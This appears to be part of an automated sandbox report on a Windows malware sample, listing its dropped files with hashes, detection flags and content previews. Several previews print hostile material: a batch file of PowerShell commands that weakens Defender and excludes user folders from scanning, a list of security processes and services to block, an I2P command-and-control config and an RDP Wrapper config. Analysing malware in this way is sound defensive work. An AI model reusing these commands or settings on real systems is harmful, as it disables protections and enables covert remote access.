                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):3747
                                  Entropy (8bit):5.505268066587477
                                  Encrypted:false
                                  SSDEEP:96:ildJ9VjDT0HU0Hn0H1V40Hu0H+kQHR3WPOaI0HNVH4/HNx0HltHn:03THT000H0740O0TQxmPOaI0tV+v0FtH
                                  MD5:83E03316D6195F194123C52235E93D72
                                  SHA1:AB5D30FC5574858F764CF184D78C1BF5AFB9E865
                                  SHA-256:A78DE1C60587C9498365DE7F7C93608DA76BDE226FE7900CECE0073AD963B511
                                  SHA-512:01D5E33F87729A0CB0BCC5C2435B2B516DA7AE0D278721F9664694BC77B117110A3B37711E76A6DE0967CF60E0E981ECC5FCE47DFDF6A60C58BA74289A2B1A17
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user~1\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):98304
                                  Entropy (8bit):6.298274541598319
                                  Encrypted:false
                                  SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
                                  MD5:319865D78CC8DF6270E27521B8182BFF
                                  SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
                                  SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
                                  SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 3%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................|..............@....reloc...............~..............@..B................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:DOS batch file, ASCII text
                                  Category:dropped
                                  Size (bytes):259
                                  Entropy (8bit):4.933902901538645
                                  Encrypted:false
                                  SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                                  MD5:261A842203ADB67547C83DE132C7A076
                                  SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                                  SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                                  SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                                  Malicious:false
                                  Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
                                  Process:C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe
                                  File Type:Generic INItialization configuration [svc]
                                  Category:dropped
                                  Size (bytes):195
                                  Entropy (8bit):4.692426693515089
                                  Encrypted:false
                                  SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
                                  MD5:E025B58CB2D118FAFAE00850EE91C5F9
                                  SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
                                  SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
                                  SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
                                  Malicious:false
                                  Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..
                                  Process:C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):23779
                                  Entropy (8bit):5.126563091127519
                                  Encrypted:false
                                  SSDEEP:384:2bbEbNQ6s69WS8vv88o888888888888888j888888888888e888888808888888K:2bbEbNQ6s69WS8vv88o888888888888V
                                  MD5:3F3FAE262334D88DAA426A685B8FC9BD
                                  SHA1:72DDB4C3C901552038C0AA26B7B12023F2CD3453
                                  SHA-256:AE53045EEF4D46057CF0CC5010A2B185D4B0B4BA033010537382686D6F002B88
                                  SHA-512:AC6275A7B864D66AC8729B10ECA9ED54A3DF19BDCD4BE29DE5BC5F9075A531606F06DBDC5C81B99DB611C97370B063E5931DAAA79FB5BFCBA0AB4A229864F8B1
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user~1\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user~1\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user~1\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user~1\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:modified
                                  Size (bytes):10639360
                                  Entropy (8bit):7.4147455331909855
                                  Encrypted:false
                                  SSDEEP:196608:PE1LTxbO313norADHLHhHiVulZ/KHNV4G:PyxbOFC8b/KtV4
                                  MD5:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
                                  SHA1:C04D89F1054F2EE34B548126A5ADD4EEE4751AE4
                                  SHA-256:44CF4321C138C4CACECC95DEBA735F508C96049E7F0E8F0538684DC4F0C1E9A5
                                  SHA-512:B099238838B0D8B258529126B3C279AC735FEFF778D52C3117EB3CD587267A145A09BC1317FB412B2C810EA8B2232A8218FE459E33AC99F9B48DECFDC62E4816
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 19%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....T.................@...................................a.....`... ..............................................................@..d...........................................`/..(....................................................text...(...........................`..`.data.............................@....rdata...^......`.................@..@.pdata..d....@.......(..............@..@.xdata.......P.......2..............@..@.bss....p....`...........................idata...............<..............@....CRT....`............R..............@....tls.................T..............@....reloc...............V..............@..B................................................................................................................................................................................................................
                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):2464
                                  Entropy (8bit):3.2433536798164977
                                  Encrypted:false
                                  SSDEEP:24:QOaqdmuF3rk6+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxU:FaqdF7k6+AAHdKoqKFxcxkFaE
                                  MD5:9F110999AD02EB9D440A4C249AB593A9
                                  SHA1:A3E1B78216E6458FDF90F93CCB33F75F922EF1B0
                                  SHA-256:451477A217A9A3DC5553589D6EFB1A48B151A10258BFBA2402F0A7F0F4B896FD
                                  SHA-512:07EEC9D8860B88D12DA33911F2B97E111470623DFC8968630E68B5A057215DA90CA46ABC27ADA539255202950798F1512BC6B681B8E698F6901E5D09735B462A
                                  Malicious:false
                                  Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.u.e. .. S.e.p. .. 2.4. .. 2.0.2.4. .2.0.:.3.1.:.0.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):8568
                                  Entropy (8bit):4.958673415285098
                                  Encrypted:false
                                  SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                  MD5:27535CEE6740DFC50A78A0322415E67C
                                  SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                  SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                  SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                  Malicious:false
                                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:Generic INItialization configuration [cnccli]
                                  Category:dropped
                                  Size (bytes):214
                                  Entropy (8bit):5.0997449470012635
                                  Encrypted:false
                                  SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
                                  MD5:26702FAAB91B6B144715714A96728F39
                                  SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
                                  SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
                                  SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
                                  Malicious:false
                                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:Generic INItialization configuration [SLPolicy]
                                  Category:dropped
                                  Size (bytes):441513
                                  Entropy (8bit):5.449545529389614
                                  Encrypted:false
                                  SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
                                  MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
                                  SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
                                  SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
                                  SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
                                  Malicious:false
                                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):37376
                                  Entropy (8bit):5.7181012847214445
                                  Encrypted:false
                                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):9146880
                                  Entropy (8bit):6.674868432808522
                                  Encrypted:false
                                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                  MD5:676064A5CC4729E609539F9C9BD9D427
                                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):129024
                                  Entropy (8bit):6.313152038164236
                                  Encrypted:false
                                  SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
                                  MD5:C89542ABA45CE1084760AE8DE6EAE09E
                                  SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
                                  SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
                                  SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):91136
                                  Entropy (8bit):6.2290767543196575
                                  Encrypted:false
                                  SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
                                  MD5:4C086C8F48C4D0F8C20410E60340AEC9
                                  SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
                                  SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
                                  SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):62449
                                  Entropy (8bit):7.807149241969407
                                  Encrypted:false
                                  SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
                                  MD5:688FDFAE15F328A84E8F19F8F4193AF2
                                  SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
                                  SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
                                  SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
                                  Malicious:false
                                  Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):92672
                                  Entropy (8bit):6.242846530333761
                                  Encrypted:false
                                  SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
                                  MD5:FDCF93ACD089B505B524DDFA0FF947F9
                                  SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
                                  SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
